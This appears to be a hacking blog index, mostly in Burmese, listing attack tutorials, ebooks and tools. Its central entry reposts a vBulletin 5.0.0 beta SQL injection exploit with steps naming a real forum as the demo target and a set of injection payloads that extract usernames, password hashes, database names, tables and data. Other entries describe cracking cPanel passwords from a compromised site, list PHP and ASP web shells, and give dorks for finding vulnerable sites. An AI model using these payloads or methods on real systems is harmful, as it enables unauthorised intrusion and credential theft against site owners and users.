[ Top Attacks ] Website Hacking

0x:1) – Injection
0x:2) – Broken Authentication and Session Management
0x:3) – Cross-Site Scripting (XSS)
0x:4) – Insecure Direct Object References
0x:5) – Security Misconfiguration
0x:6) – Security Misconfiguration
0x:7) – Insecure Cryptographic Storage – Merged with 0x13
0x:8) – Sensitive Data Exposure
0x:9) – Failure to Restrict URL Access – Broadened into
0x:10) – Missing Function Level Access Control
0x:11) – Cross-Site Request Forgery (CSRF)
0x:12) - Security Misconfiguration
0x:13) – Using Known Vulnerable Components
0x:14) – Unvalidated Redirects and Forwards
0x:15) – Insufficient Transport Layer Protection

Thanks To #India Forum @ Edward Maya

Continue Reading

LFI-Via-phpinput Tutorial By H1N1

က်ြန္ေတာ္တို ့ MHU က အကိုျကီး ကို H1N1 ရဲ ့ LFI-Via-phpinput Tutorial စာအုပ္ပါ ။ LFI ကို Php://input နဲ ့ Attacking လုပ္သြားပံုေလးကို ပံုနဲ ့တကြ ေသခ်ာရွင္းျပထားပါတယ္ ။ :D ဖတ္ျကည့္လိုက္ရင္ ပိုနားလည္သြားမွာပါ :D 

Download : http://www.mediafire.com/download/md2w1k21pi1ssih/LFI-Via-phpinput_Tutorial_by_H1N1.pdf

Continue Reading

UNION BASE INJECTION (Ebook)

ဒါက်ြန္ေတာ့္ရဲ ့ပထမဦးဆံုး SQL Injection စာအုပ္ပါ။ Chapter 1 မွာေတာ့ Union Select နဲ ့Inject လုပ္ပံုလုပ္နည္းေလးဘဲေရးထား ပါတယ္ .. .. :D

Download
https://www.dropbox.com/s/ljv6qykcyi8ij94/Union%20Base%20SQL%20Injection%20By%20little.pdf
(or)
: http://www.mediafire.com/download/amdhfvutdec1sb4/Union_Base_SQL_Injection_By_little.pdf

လင့္ ေသသြားရင္ Comment ေပးခဲ့ပါ . တျခား ဆိုက္ေနတင္ ထပ္တင္ေပးေပါ့မယ္ :D

Continue Reading

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)

1337 မွာ $ 300 နဲ ့ေရာင္းထားတာေလးပါ  :)

http://www.priv8.1337day.com/exploit/description/20002

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O

Step 1
Create an Account on vBulletin forum Verify the account and Activate it
For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login

Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon
Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button
Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The Above SQLi command will fetch out the first record from user table(username/password)
see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)

=============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|User():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

Greetz to HeXagone  & Raw-X

Continue Reading

Cpanel Cracker (Php Script)

CPanel Cracking Script ပါ ။ Shell ေပၚက တဆင့္ Crack ရတာပါ ။ Tutorial ဖတ္ခ်င္ရင္ http://lit2le.blogspot.com/2013/07/tut-cpanel-cracking.html မွာသြားဖတ္ပါ ။ 

Download :.: > http://pastebin.com/CTYx2hUt

Continue Reading

[TUT] Cpanel Cracking

FOR EDUCATIONAL PURPOSE ONLY

လိုအပ္တာက  :-

• Shelled site
• Cpanel Password Cracker (shell) (http://lit2le.blogspot.com/2013/07/cpanel-cracker-php-script.html)

Step By Step Tutorial :-

• First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here . 
• Then go down & click on User .

• Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

• When the cracking is finished, you will see the result . 

• password ရျပီ ဆိုရင္ -> www.site.com:2082 (ဒါမွမဟုတ္) www.site.com/cpanel ကေန၀င္ပါ ။ (www.site.com:2082 ကအဆင္ေျပ ပိုအဆင္ေျပပါတယ္) :D 

Have Fun lady :)

Credit : h@ck2PlAy

Continue Reading

PHP & ASP Shells [Collection]

က်ြန္ေတာ္ သိထားတဲ့ Php Shell နဲ ့ Asp Shell . Web hack ေနတဲ့ ညီကိုေတြအဆင္ေျပတာေအာင္လို ့ပါ ။ 

(Link ေသသြား Comment ထဲမွာေရးေပးခဲ့ပါ) :D Enjoy :D 

PHP Shells 

• b374k.txt 
• C100.txt 
• C99.txt 
• R00t.txt 
• R57.txt 
• R57shell1.40.txt 
• R57shell1.50.txt 
• R57shell2.0.txt.zip 
• Mulci V2.0.txt 
• Sniper-Sa Shell.txt 
• Egy-Spider Shell 
• Uploader.txt 

ASP Shells 

• Aspx Shell.txt 
• Pouya Asp Shell.txt 
• Kacak ASP shell.txt 
• Zehir ASP shell.txt 
• Zehir4 ASP shell.txt 

Continue Reading

SQLMap Tutorial By H1N1

က်ြန္ေတာ္တို ့ M.H.U က Bro H1N1 ေရးထားတဲ့ စာအုပ္ေလးပါ ။ SQLmap ျဖင့္ Attacking လုပ္တဲ့နည္းေလး အေျခခံက်က် ေရးေပးထားပါတယ္ ။ ။ ။ SQLMap အေျကာင္းကိုေလ့လာေနတဲ့ ညီကုိေတြအတြက္ အထူးအဆင္ေျပေလာက္တယ္ ။ ။

[+] Download From Mediafire [+]

http://www.mediafire.com/download/svd3yuu0dmez9ed/Sqlmap_Tutorial_By_H1N1.pdf

Continue Reading

:.: BurpSuite :.:

Burp Suite ဆိုတာဘာလဲ ? 

Burp ကေတာ့ website security ပိုင္းဆိုင္ရာမွာ အလြန္ကိုေကာင္းမြန္တဲ့ tools တခုပါ ။ Security သုေတသနေတြနဲ႔ Security Pentester ေတြအမ်ားဆံုး အသံုးၿပဳၾကပါတယ္ ။ Interface ေပါင္းေၿမာက္မ်ားစြာနဲ႔ Tools အမ်ိဳးမ်ိဳးပါ၀င္ၿပီး programming languages တခုျဖစ္တဲ့ Java နဲ ့ေရးထားေသာ Application တခုျဖစ္ပါတယ္ ။

ပါ၀င္တဲ့ Features ေတြက :.:

Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.

Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Intruder: Burp Intruder is a tool for automating customised attacks against web applications.

Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.

Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.

Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).

Source: http://www.portswigger.net/suite/ 

Top 125 Network Security Tools ေတြထဲမွာ Burp Suite  ဟာ 13 ေနရာမွာ တည္ရွိေနျပီး 2013 top 15 hacking tool ထဲမွာ နံပါတ္ 1 ေနရာမွာတည္ရွိေနပါတယ္ ။ Burp Suite ဟာ SQLmap လိုမ်ိဳး Click and Automatic tool တမ်ိဳးမဟုတ္တလို Webscanner သီးသန္ ့လဲမဟုတ္ပါဘူး .. .. ေနာက္ Burp Suite Tutorial ေတြ ဖတ္ရင္ နားလည္လာျပီး အရသာေတြ ့လာပါလိမ့္မယ္ ။

Continue Reading

About : Jonathan James : (ပင္တဂြန္ႏွင့္ နာဆာကုုိ HACK ခဲ့သူ လူငယ္တစ္ေယာက္ျဖစ္ရပ္)

Jonathan James လို႔အမည္ရတဲ့ လူငယ္တစ္ဦးပါ။ ပင္တဂြန္စစ္ဌာနခ်ဳပ္က ကြန္ျပဴတာေတြကိုုဟက္ခဲ့ျပီး နာဆာက ဆာဗာကြန္ျပဴတာကိုုပါ ၂၁ ရက္ Down သြားေအာင္ ဟက္သြားခဲ့သူ ျဖစ္ပါတယ္။ အဲ့တုန္းက အသက္ ၁၅ ႏွစ္ပဲ ရွိပါေသးတယ္။ အေမရိကန္ျပည္ေထာင္စုု ဖေလာ္ရီဒါျပည္နယ္မွာ ေနထုုိင္ျပီး အထက္တန္းေက်ာင္းသားဘဝမွာတင္ ေက်ာင္းက ကြန္ျပဴတာလံုုျခံဳေရး စနစ္ေတြကိုု ဖ်က္ဆီးမွုုေၾကာင့္ လူသတိထားခံလာရသူ ျဖစ္ပါတယ္။ ဗာဂ်ီနီးယား ျပည္နယ္က ပင္တဂြန္စစ္ဌာနခ်ဳပ္အခြဲ သုုေတသနစစ္စခန္း တစ္ခုုက ကြန္ျပဴတာေပါင္းေျမာက္မ်ားစြာကုုိ ၁၉၉၉ ခုုႏွစ္ ေအာက္တိုဘာလက စဟက္ပါတယ္။ သူ႔ၾကိဳးစားမွုုေၾကာင့္ စစ္တပ္က ကြန္ျပဴတာ မ်ား ပ်က္ဆီးခဲ့ျပီး ေနာက္ထပ္ေျခလွမ္းအေနနဲ႔ နာဆာက ျဂိဳလ္တုုထိန္းခ်ဳပ္ ကြန္ျပဴတာ ဆာဗာကိုု လွမ္း Hack ပါတယ္။ Backdoor ကုိအသံုုးျပဳျပီး လံုုျခံဳေရးအတားအဆီးအားလံုုးကိုု bypass လုုပ္သြားတာပါ။ ေနာက္ေတာ့ ကြန္ျပဴတာေပါင္း ရာေက်ာ္ လွ်ိဳ ႔ဝွက္ကုုဒ္နံပါတ္မ်ား ေပ်ာက္ဆံုုးရျပီး ကမၻာ့အျပင္ေရာက္ေနတဲ့ ျဂိဳလ္တုု နဲ႔အာသာက စခန္းမ်ားကိုု ထိန္းခ်ဳပ္ရန္ အခက္အခဲမ်ား ျဖစ္ေစပါေတာ့တယ္။ ယင္းအတြက္ အေျဖရွာဖုုိ႔နာဆာတို႔ ၃ ပတ္အခ်ိန္ယူလိုုက္ရျပီး ျပဳျပင္မွုုအတြက္ ကုုန္က်စရိတ္ အေမရိကန္ေဒၚလာ ၄၁၀၀၀ ကုုန္က်ခဲ့ပါတယ္။ Server Down တဲ့ ၂၁ ရက္အတြင္း ဆံုုးရွံုုးရတဲ့ ေငြေၾကး ပမာဏ မပါရွိေသးပါဘူး။ ဒါနဲ႔ IP Source ကုိရေအင္ယူျပီး ဖေလာ္ရီဒါက ၁၅ ႏွစ္သား james ကို ကြန္မန္ဒိုုမ်ား ဝင္စီးပါေတာတယ္။ ၆ လ အခ်ဳပ္ထဲ ေနခဲ့ရျပီး အိမ္အက်ယ္ခ်ဳပ္ကိုု ႏွစ္နဲ႔ခ်ီခ် ပါတယ္။ ယင္းအတြက္ ေထာင္ဒဏ္ ၁၀ ႏွစ္က်ခံရႏိုုင္တဲ Jonathan James ဟာ တရားရံုုးေတာ္ခ်ိန္းဆုုိခ်က္ကိုု ၂၀၀၈ ခုုႏွစ္မွာ ေနာက္တစ္ခါ ထပ္သြားရမွာ ျဖစ္ပါတယ္။ ၾကားထဲ ကာလမွာ သူဟာ အျမဲေစာင့္ၾကည့္ခံရပါတယ္။ ကြန္ျပဴတာကိုုလည္း ဘယ္အေၾကာင္းအမ်ိဳးမ်ိဳးနဲ႔မွ အသံုုးျပဳခြင့္ မေပးပါဘူး။ သုိ႔ေပမယ့္ ေစာင္ၾကည့္ကာလမွာတင္ James ဟာ ဝါသနာကိုု မစြန္႔လြတ္ျပီး Hacking ကိုု ဆက္လိုုက္စားပါတယ္။ အေမရိကန္က နာမည္ၾကီးဟက္ကာမ်ားနဲ႔ ပူးေပါင္းမိလာျပီး ဟက္ကာ ေလာကမွာ အခ်င္းမ်ားစရာမ်ား ျဖစ္လာပါတယ္။ ဒီလိုုနဲ႔ Hacking နဲ႔ပက္ သက္လို႔ စိတ္အေႏွာင့္အယွက္ျဖစ္လာျပီး စိတ္က်ေရာဂါေဝဒနာ ခံစားလာရျပီး ၂၀၀၈ ခုႏွစ္ ေမလ ၁၈ ရက္ေန႔မွာ ေသဆံုုးေနတဲ့ Jonathan James ကုိေတြ႔ရွိခဲ့ပါတယ္။ ေရခ်ိဳးခန္းထဲမွာ ေသနတ္တစ္လက္နဲ႔ ကိုုယ့္ေခါင္းကိုုယ္ပစ္ျပီး လုုပ္ၾကံ ခဲ့တာ ျဖစ္ပါတယ္။ စာလည္းခ်န္ခဲ့ပါတယ္။ သူခ်န္ထားတဲ့ စာမွာ သူအစြပ္စြဲခံရတဲ့ Hacking အမွုုတစ္ခုုပါဝင္ပါတယ္။ စပါမားကတ္ Network တစ္ခုကုုိ ဟက္ကာမ်ား Hack ထားတဲ့အမွုုတစ္ခုုပါ။ သူပါဝင္တယ္ဆုိတဲ့အခ်က္ မဟုုတ္ေၾကာင္း တရားမွ်တမွုုဟူသည့္အခ်က္အေပၚမွာ သူအယံုုအၾကည္ မရွိေတာ့ေၾကင္း ဘာညာနဲ႔ စာတစ္ေစာင္ခ်န္ခ့ဲျခင္း ျဖစ္ပါတယ္။ ဒီေတာ့ အသက္ ၁၅ ႏွစ္အရြယ္မွာတင္ ပင္တဂြန္စစ္ဌာနခ်ဳပ္နဲ႔ နာဆာကိုု Hack ႏိုုင္တယ္။ သိုုေပမယ့္ ကိုုယ့္ကိုုယ္ကိုု ေသေၾကာင္း ၾကံစည္ခဲ့တဲ့ James ဟာ ကမၻာ့ Hacker ေလာကမွာ ေျခာက္ျခားဖြယ္ရာ ျဖစ္ရပ္တစ္ခုု အျဖစ္ က်န္ရွိေစခဲ့ေၾကာင္း သိရပါတယ္။ .. 

Ref: wiki Aung Kham (TSJ team) Ref & Credit to TechSpace Journal

Continue Reading

Certified Ethical Hacker (CEH) STUDY GUIDE

CEH တက္မဲ့ ေက်ာင္းသားအတြက္ လိုအပ္မယ္ထင္ပါတယ္ .. ..  စိတ္၀င္စားရင္ ဖတ္ျကည့္လိုက္ပါ .. ဘာဘဲျဖစ္ျဖစ္ ဗဟုသုတ ရတာေပါ့ ။ 

The book provides full coverage of exam topics & real-world examples.

You can expect:
Covers ethics and legal issues, footprinting, scanning, enumeration, system hacking, trojans and backdoors, sniffers, denial of service, social engineering, session hijacking, hacking Web servers, Web application vulnerabilities... and more

Full PDF:
http://noorasec.com/books/CEH2010V6.pdf

Continue Reading

SQLmap On Window by liT2le [Ebook]

SQLmap On Window ဆိုတာ window ေပၚမွာ Sqlmap Run တာေပါ့ ငိြငိြ :P ဒါက်ြန္ေတာ့္ရဲ ့ပထမဦးဆံုး Ebook ပါ ။ :) အရင္က MHU ဖိုရမ္မွာ ကို H1N1 (ေခၚ) အူးတုတ္ျကီး ေရးခဲ့ပါတယ္.. ခု sqlmap ကို Base Command ေလာက္နဲ ့ဘဲ လုပ္ျပေပးထားပါတယ္.. က်ြန္ေတာ္စာမွာ အမွားပါရင္ ေတာင္းပန္ပါတယ္ .. ပထမဦးဆံုးဟုတ္လို ့ပါ :D :)

Download :>: SQLmap On Window by lit2le

Continue Reading

Bypass Any blocked Website or port

က်န္ေတာ္တို ့တခ်ိဳ ့Website ေတြကို၀င္တဲ့အခါ ကိုယ့္ Connection ကဘဲျဖစ္ျဖစ္ ႏိုင္ငံကဘဲျဖစ္ျဖစ္ ပိတ္ထားက်ပါတယ္. အဲ့ပိတ္ထားတဲ့ ဆိုဒ္ေတြကို၀င္နည္း(Method) 2မ်ိဳးရွိပါတယ္ .. ေအာက္မွာဆက္ျကည့္ပါ ။ 

Method 1: 

ပထမနည္းက Online Proxy သံုးျပီး၀င္လို ့ရပါတယ္.. ေအာက္မွာ Online Proxy ၁၀၀ ေပးထားပါတယ္.. အဆင္ေျပတဲ့ Link ကေန၀င္ႏိုင္ပါတယ္ .... 

1. http://www.unblocked-proxy.com
2. http://www.unblockedproxy.net
3. http://www.allunblocked.com
4. http://www.unblockfor.me
5. http://www.accessanywebsite.com/
6. http://www.proxican.com
7. http://www.websurfing.cn
8. http://www.steelproxy.com
9. http://bypass.it.cx
10. http://www.agproxy.com
11. http://unblockbypass.com
12. http://www.covertbrowser.info
13. http://bypass.secure.la
14. http://www.wayaroundit.info/
15. http://www.trixme.com

Continue Reading

Vbulletin Forum Sql Injection [ Video Tutorial ]

Vulnerabilities Dork : inurl:"forums/group.php" Powered by vBulletin® Version 4.1.2

VB hashes ေတြကို Crack ပို ့အတြက္ Password Pro သံုးပါ ... (ဒီမွာဖတ္ပါ) 

Video and data provided by MENTAL_MIND 

 Credit And Regart's : MENTAL_MIND

Continue Reading

သင့္ Website လုံျခံဳေရးကိုကာကြယ္ပါ

==============================
1. ကုိယ့္ဆုိဒ္မွာ သုံးတဲ့ script အမ်ိဳးအစားအလုိက္ update ေတြ release လုပ္တုိင္း
version ျမုင့္ပါ 
2. Password Combo ကုိတက္ႏုိင္သမွ် ခက္ခဲေအာင္ျပဳလုပ္ပါ
3. Admin Login email ကုိ secure လုပ္ပါ 
4. Database_prefix ေတြကုိေျပာင္းလဲပါ ... ဥပမာ ... wp_ နဲ.စထားရင္ wordpress ဆုိဒ္မွန္း အလြယ္တကူခန္.မွန္းႏုိင္သလုိ ... jos_ နဲ.စထားရင္ joomla မွန္းအလြယ္သိႏုိင္ပါတယ္...
5. Database ကုိ Password ခ်ပါ
6. CMS သုံးရင္ install folder ကိုျပန္ဖ်က္ဖုိ.မေမ့ပါႏွင့္
7. plugin အမ်ားစုကေန မၾကာခဏဆုိသလုိ error ေတြတက္ေလ့ရွိတာေၾကာင့္ plugin ကုိေရြးခ်ယ္အသုံးျပဳပါ
8. နည္းပညာ web blog မ်ားကို မ်က္ေျခမပ်က္ေစပဲ အတက္ႏုိင္ဆုံး ... up-to-date ျဖစ္ေနပါေစ

REF: net
Nothing is 100% secure!
[-- 4sectors --] 
Credit : 4sec

Continue Reading

How secure is DNN?

DNN Hacking ကို ဒီမွာ သြားဖတ္ပါတယ္ ... မ်ားေသာအားျဖင့္ DNN hacking မွာ ျမန္မာဆိုဒ္ေတြေတာ္ေတာ္နဲပါတယ္. မရွိတေလာက္ပါဘဲ . ဒါမဲ့ DNN ေပါက္တဲ့ တခ်ိဳ ့ျမန္မာဆိုဒ္ေတြရွိပါတယ္.. ဒါေျကာင့္ ကာကြယ္နည္းေျပာျပေပါ့မယ္. . . ပထမဦးဆံုး Fcklinkgallery.aspx ကိုနာမည္ေျပာင္းထားလိုက္ပါ ။ အစားထိုးလင့္အရ FCKGallery တက္လာမွာမို ့နာမည္ခ်ိန္းလိုက္
ရင္တက္လာမွာမဟုတ္ေတာ့ပါဖူး၊ေတာ္ရံုတန္ရံုဟက္ကာဆိုရင္မိမိ FCK Name ကိုမသိတာနဲ့လက္ေလ်ာ့သြားမွာပါ။ FCKgalllery မရွိရင္ ဘာမွကို Upload လုပ္လို့မရေတာ့လို ့ Shell တင္ခြင့္မရွိပါ ။ အမည္ေျပာင္းတာကိုေတာ့ 
<dotnetnuke><htmlEditor><providers><add name=”FckHtmlEditorProvider”>
မွာ ေျပာင္းထားနိုင္ပါတယ္ ။

Continue Reading

NetworkHackingTesting (BT)

Network Hacking လို ့နာမည္ေပးထားေပမဲ့ အင္တာနက္ဆိုင္မွာ တျခား cpu ကိုထိန္းခ်ဳပ္ခ်င္လို ့ဘဲျဖစ္ျဖစ္ ... ကိုယ့္ Wifi ကြန္ယက္မွာ အျခားကြန္ျပဴတာမ်ားကို (ဆာဗာအပါအ၀င္)ထိန္းခ်ဳပ္ခ်င္တာဘဲျဖစ္ျဖစ္ Armitage ကိုအသံုးျပဳျပီး ဟက္ျပသြားမွာပါ .. ..  Armitage ဆိုတာ Back Track ရဲ ့ Built in Hacking Tool တခုကိုအေျခခံျပီး စမ္းသပ္ျပသသြားမွာပါ .. ေရးသားသူ bro 3thic0kiddi3 ပါ ။ back track ေပၚမွာ အေျခခံျပီး Hack လုပ္ျပသြားမွာပါ .. ..

Continue Reading

Mozilla Add-ons ~! ( F0r Hacking And IT Security )

To set all here Mozilla Add-ons > Add-ons .
အသံုး၀င္ႏိုင္မယ္ထင္တဲ့ Add On (35) ခု ေတြစုေပးထားတာပါ ။ :) F0r Hacking And IT Security ! :)

1. FREE EBOOK SEARCH : to find the e-book.
2. SPY SERVER : see the type of server.
3. DOMAIN FINDER : search for a domain.
4. WHO IS : see details of the site.
5. ABOUT THIS SITE : see website details
6. TIX NOW : turn off timer rapidshare.
7. Firebug : edit html, css, javascript in virtual hacking.
8. XSS-Me : xss trial to the target site.
9. SQL Inject Me : SQL Injection experiments to the target site.
10. Unhide Passwords : see our current password sniffing on the LAN itself.

Continue Reading

Python

Code ပိုင္းတခုျဖစ္တဲ့ python နဲ ့မိတ္ဆက္ေပးပါမယ္ .. .. အဲ့ Group ေလးကိုသြားလိုက္ပါ
>> www.facebook.com/groups/361983457247340 << Python လို ့ေခၚတဲ့ Code ပိုင္းကိုေလ့လာေနသူေတြ အတြက္အဆင္ေျပမွာပါ ။ က်ြန္ေတာ္တို ့လို Beginner ေတြအတြက္အဆင္ေျပမွာပါ . . .

What is Python ,
How To Use ,
Ebook ,
Tool ,
Tutorial နဲ ့
Base ေတြပါ ေလ့လာလို ့ရပါတယ္ . . .  :) ေနာက္ပိုင္းလဲ က်ြန္ေတာ္သိတေလာက္ Python ကို ဒီ Group မွာဘဲ ဆက္ေဆြးေႏြးျဖစ္မွာပါ .. .. Welc0me all :)

#Have Fun :)

Continue Reading

Top 15 Security/Hacking Tools Utilities

Top 15 Security/Hacking Tools Utilities 

Tools က 15 ခုပါ ။ သံုးစြဲရတာ သူ ့နည္းနဲ ့သူေပါ့ .. တခ်ိဳ ့Tool ၇ဲ ့Info ေတြေ၇းေပးထားပါတယ္.. Download လင့္ေတြကေတာ့ မူရင္းဆိုဒ္ကဘဲဆိုေတာ့ link ေတြအေကာင္းေကာင္းအလုပ္လုပ္ပါတယ္ .. .. .. :)

1). Nmap (Nmap ၇ဲ ့Tuto ကို Ghostarea မွာသြားဖတ္လို ့ရပါတယ္)
 #:.Download.:#
http://nmap.org/download.html

2). Nessus Remote Security Scanner
Nessus ဆိုတာ က vulnerability scanner နာမည္ျကီးတခုပါ ။ 
#:.Download.:#
http://www.nessus.org/download/

Continue Reading